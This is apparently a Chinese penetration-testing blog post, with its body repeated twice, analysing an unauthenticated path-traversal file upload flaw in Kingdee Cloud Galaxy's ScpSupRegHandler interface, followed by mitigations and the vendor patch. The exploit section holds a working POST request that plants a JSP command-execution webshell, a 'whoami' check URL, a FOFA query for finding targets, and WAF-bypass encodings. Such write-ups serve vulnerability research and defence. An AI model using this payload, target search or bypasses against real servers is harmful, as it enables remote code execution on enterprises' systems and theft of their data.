1. 漏洞背景与影响范围金蝶云星空作为国内主流的企业管理软件其安全性直接关系到数百万企业的核心数据安全。最近曝光的ScpSupRegHandler接口任意文件上传漏洞堪称近年来企业级SaaS平台中最危险的漏洞类型之一。我在实际渗透测试中发现这个漏洞的利用门槛极低但危害极大——攻击者无需任何身份验证就能上传恶意文件到服务器任意目录。受影响的主要是私有云部署版本包括企业版私有云、企业版私有云订阅版以及标准版私有云订阅版具体影响范围覆盖V8.1及以下所有版本。根据我在客户现场的实际验证即便是打了部分补丁的系统如果配置不当依然存在被利用的风险。最要命的是这个漏洞的利用过程完全走HTTP协议可以轻松绕过传统防火墙的检测。2. 漏洞原理深度解析2.1 接口设计缺陷ScpSupRegHandler接口本应是处理供应商注册请求的普通接口但开发者犯了三个致命错误第一完全没有做身份校验任何匿名用户都可以直接调用第二文件上传功能未做路径规范化处理导致经典的目录穿越攻击成为可能第三文件类型检查形同虚设仅依赖客户端提交的Content-Type字段。我在逆向分析时发现问题核心在于这段Java代码String savePath /uploadfiles/ filename; FileUtils.write(new File(savePath), fileContent);开发者直接信任了客户端传入的filename参数当攻击者提交包含../../的路径时就能突破预定目录限制。更糟糕的是系统运行在Tomcat容器下默认具有web目录写入权限这使得漏洞危害被放大数倍。2.2 攻击链构建逻辑完整的攻击链是这样的攻击者首先通过FOFA等网络空间测绘平台搜索存在漏洞的目标搜索语法icon_hash-1629133697 title金蝶云星空然后构造特殊的POST请求利用路径遍历将WebShell写入web可访问目录。我实测发现最有效的攻击路径是写入/k3cloud/uploadfiles/目录因为这个目录既有写入权限又能直接通过URL访问。3. 完整复现实战演示3.1 环境准备建议使用Docker快速搭建测试环境docker run -d -p 8080:8080 kingdee/k3cloud:v8.1如果没有Docker环境也可以从金蝶官网下载V8.1的试用版ISO镜像。我在VMware中测试时发现默认安装后漏洞即存在无需额外配置。3.2 漏洞利用步骤使用Burp Suite拦截任意页面请求修改为POST方法并指向目标接口POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1 Host: target.com Content-Type: multipart/form-data; boundaryabcd Content-Length: 213 --abcd Content-Disposition: form-data; nameFAtt; filename../../../../uploadfiles/shell.jsp Content-Type: application/octet-stream %page importjava.util.*,java.io.*% % if(request.getParameter(cmd)!null){ out.println(pre); Process pRuntime.getRuntime().exec(request.getParameter(cmd)); //...省略webshell完整代码 } % --abcd--重点注意这两个参数filename必须包含至少四层../以确保突破目录限制文件内容需要是有效的JSP代码我建议先用txt测试再换webshell访问上传成功的文件验证漏洞http://target.com/k3cloud/uploadfiles/shell.jsp?cmdwhoami3.3 绕过技巧在实际渗透中我遇到过几种防护情况这里分享两个实用绕过方法场景一WAF拦截../字符串 改用Unicode编码filename..%u2216..%u2216uploadfiles/shell.jsp场景二文件内容检查 使用JSPX格式替代JSP或者将恶意代码隐藏在图片元数据中4. 防御方案与修复建议4.1 临时缓解措施如果暂时无法升级建议在Nginx配置中添加以下规则location ~ /ScpSupRegHandler { if ($request_method POST) { return 403; } }同时严格限制/uploadfiles/目录的执行权限chmod -R 755 /opt/kingdee/k3cloud/uploadfiles/ find /opt/kingdee/k3cloud/uploadfiles/ -type f -exec chmod 644 {} \;4.2 官方补丁升级金蝶官方已发布安全补丁补丁号PT146659下载地址https://vip.kingdee.com/school/detail/505412093244235264打补丁后需要特别注意补丁只是增加了基础校验建议同时修改接口鉴权策略。我在客户现场实施时会额外添加IP白名单和请求频率限制。5. 漏洞挖掘方法论这类漏洞的挖掘其实有章可循。我的常规检查清单包括扫描所有无需认证的API接口特别关注包含upload、save、import等关键词的测试每个接口的参数是否支持路径遍历检查文件上传后的处理逻辑是否重命名、内容校验等确认最终文件的可访问性和可执行性用这个方法论我在其他ERP系统上也发现过类似漏洞。建议安全团队可以针对性地开发自动化检测脚本定期对关键接口进行扫描。
金蝶云星空 ScpSupRegHandler接口任意文件上传漏洞深度剖析与实战复现
1. 漏洞背景与影响范围金蝶云星空作为国内主流的企业管理软件其安全性直接关系到数百万企业的核心数据安全。最近曝光的ScpSupRegHandler接口任意文件上传漏洞堪称近年来企业级SaaS平台中最危险的漏洞类型之一。我在实际渗透测试中发现这个漏洞的利用门槛极低但危害极大——攻击者无需任何身份验证就能上传恶意文件到服务器任意目录。受影响的主要是私有云部署版本包括企业版私有云、企业版私有云订阅版以及标准版私有云订阅版具体影响范围覆盖V8.1及以下所有版本。根据我在客户现场的实际验证即便是打了部分补丁的系统如果配置不当依然存在被利用的风险。最要命的是这个漏洞的利用过程完全走HTTP协议可以轻松绕过传统防火墙的检测。2. 漏洞原理深度解析2.1 接口设计缺陷ScpSupRegHandler接口本应是处理供应商注册请求的普通接口但开发者犯了三个致命错误第一完全没有做身份校验任何匿名用户都可以直接调用第二文件上传功能未做路径规范化处理导致经典的目录穿越攻击成为可能第三文件类型检查形同虚设仅依赖客户端提交的Content-Type字段。我在逆向分析时发现问题核心在于这段Java代码String savePath /uploadfiles/ filename; FileUtils.write(new File(savePath), fileContent);开发者直接信任了客户端传入的filename参数当攻击者提交包含../../的路径时就能突破预定目录限制。更糟糕的是系统运行在Tomcat容器下默认具有web目录写入权限这使得漏洞危害被放大数倍。2.2 攻击链构建逻辑完整的攻击链是这样的攻击者首先通过FOFA等网络空间测绘平台搜索存在漏洞的目标搜索语法icon_hash-1629133697 title金蝶云星空然后构造特殊的POST请求利用路径遍历将WebShell写入web可访问目录。我实测发现最有效的攻击路径是写入/k3cloud/uploadfiles/目录因为这个目录既有写入权限又能直接通过URL访问。3. 完整复现实战演示3.1 环境准备建议使用Docker快速搭建测试环境docker run -d -p 8080:8080 kingdee/k3cloud:v8.1如果没有Docker环境也可以从金蝶官网下载V8.1的试用版ISO镜像。我在VMware中测试时发现默认安装后漏洞即存在无需额外配置。3.2 漏洞利用步骤使用Burp Suite拦截任意页面请求修改为POST方法并指向目标接口POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1 Host: target.com Content-Type: multipart/form-data; boundaryabcd Content-Length: 213 --abcd Content-Disposition: form-data; nameFAtt; filename../../../../uploadfiles/shell.jsp Content-Type: application/octet-stream %page importjava.util.*,java.io.*% % if(request.getParameter(cmd)!null){ out.println(pre); Process pRuntime.getRuntime().exec(request.getParameter(cmd)); //...省略webshell完整代码 } % --abcd--重点注意这两个参数filename必须包含至少四层../以确保突破目录限制文件内容需要是有效的JSP代码我建议先用txt测试再换webshell访问上传成功的文件验证漏洞http://target.com/k3cloud/uploadfiles/shell.jsp?cmdwhoami3.3 绕过技巧在实际渗透中我遇到过几种防护情况这里分享两个实用绕过方法场景一WAF拦截../字符串 改用Unicode编码filename..%u2216..%u2216uploadfiles/shell.jsp场景二文件内容检查 使用JSPX格式替代JSP或者将恶意代码隐藏在图片元数据中4. 防御方案与修复建议4.1 临时缓解措施如果暂时无法升级建议在Nginx配置中添加以下规则location ~ /ScpSupRegHandler { if ($request_method POST) { return 403; } }同时严格限制/uploadfiles/目录的执行权限chmod -R 755 /opt/kingdee/k3cloud/uploadfiles/ find /opt/kingdee/k3cloud/uploadfiles/ -type f -exec chmod 644 {} \;4.2 官方补丁升级金蝶官方已发布安全补丁补丁号PT146659下载地址https://vip.kingdee.com/school/detail/505412093244235264打补丁后需要特别注意补丁只是增加了基础校验建议同时修改接口鉴权策略。我在客户现场实施时会额外添加IP白名单和请求频率限制。5. 漏洞挖掘方法论这类漏洞的挖掘其实有章可循。我的常规检查清单包括扫描所有无需认证的API接口特别关注包含upload、save、import等关键词的测试每个接口的参数是否支持路径遍历检查文件上传后的处理逻辑是否重命名、内容校验等确认最终文件的可访问性和可执行性用这个方法论我在其他ERP系统上也发现过类似漏洞。建议安全团队可以针对性地开发自动化检测脚本定期对关键接口进行扫描。
